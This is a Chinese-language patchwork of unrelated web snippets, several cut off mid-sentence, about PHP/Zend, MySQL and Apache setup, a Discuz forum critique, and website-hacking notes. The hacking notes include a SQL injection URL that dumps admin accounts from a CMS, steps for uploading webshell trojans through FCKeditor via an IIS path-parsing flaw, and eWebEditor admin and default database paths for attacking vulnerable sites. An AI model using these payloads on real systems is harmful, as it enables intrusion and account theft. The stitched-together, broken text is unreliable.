先注册一个用户。 注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5

前边没用Zend，今天找了个加密过程文件需要用到它才能运行，于是到官网上下了最新版ZendOptimizer-3.3.0a-Windows-i386.exe。 正常安装后，运行info.php看Zend写入信息，只写出上三行无下俩行版本号，证明有问题没成功！！！

于是打开WINDOWS/PHP.INI 文件 ，拉到最后看到如下：

zend_extension_ts="C:\Webserver\Zend\lib\Optimizer-3.3.0\ZendOptimizer.dll"
zend_extension_manager.optimizer_ts="C:\Webserver\Zend\lib\Optimizer-3.3.0"

看到

刚才看到DZ论坛网友nLeXeR发的对于viewthread.htm的改进意见，感觉不错，如果官方不改，以后自己慢慢的摸索改。以下是意见全文：进了DZ论坛，就像进了一个大观园，满页的可点击的地方，满页的各种功能，大部分可以去掉，可以简化，可以改进！DZ完全没有人性化，新人进来了都不知道干啥。

我的改进意见是，去掉不用的功能，改进需保留的功能，所有词汇傻瓜化，让每一个上网初学者都能看懂。

我从上往下一说吧，就现在这个帖子。

最上面是LOGO，BANNER，这个最重要，是网站就有

接下来是登陆注销资料

ExpressionEngine 我认为是国外CMS中的精品，基于CodeIgniter框架开发

不说别的，就后台来说，没有哪个CMS比ExpressionEngine 漂亮好用

目前ExpressionEngine 最新版本是1.6.3 新版本2.0即将发布

下载ExpressionEgine1.6.3

==========================================

下面的是MySQL安装的图解，用的可执行文件安装的，详细说明了一下！

打开下载的mysql安装文件mysql-5.0.27-win32.zip，双击解压缩，运行“setup.exe”，出现如下界面：

　　mysql安装向导启动，按“Next”继续

使用手记
一、使用软件：
apache_2.0.52-win32-x86-no_ssl  
php-5.0.2-Win32
mysql-4.0.21-win
phpMyAdmin-2.6.0
配置环境：Windows Xp sp2
二、具体步骤
注意事项：安装过程，任何目录和文件名都不要使用空格，
不要使用D:\Program Files 而要使用D:\ProgramFiles
1. apache_2.0.52-win32-x86-no_ssl  
apache服务器软件，我下载的是win版本，2.0系列的配置都是相似的。
双击安装apache2.0.52,我把它安装到D:\ApacheGroup 注意，目录名不要包含

fckeditor漏洞利用：

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马，利用2003路径解析漏洞，也可以直接上传ASP木马。

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如：

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

这时候我们就创建了一个名为xi

有eWebEditor漏洞的站还很多，平时经常碰到，有时想搞一下总忘记几个关键文件的名称和路径。
       今天抽点时间写在这里，做个记号，以后再碰到就好找了.

文件名称及路径：
Admin_Login.asp     登录页面
Admin_Default.asp   管理首页
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp

db/ewebeditor.mdb   默认数据库路径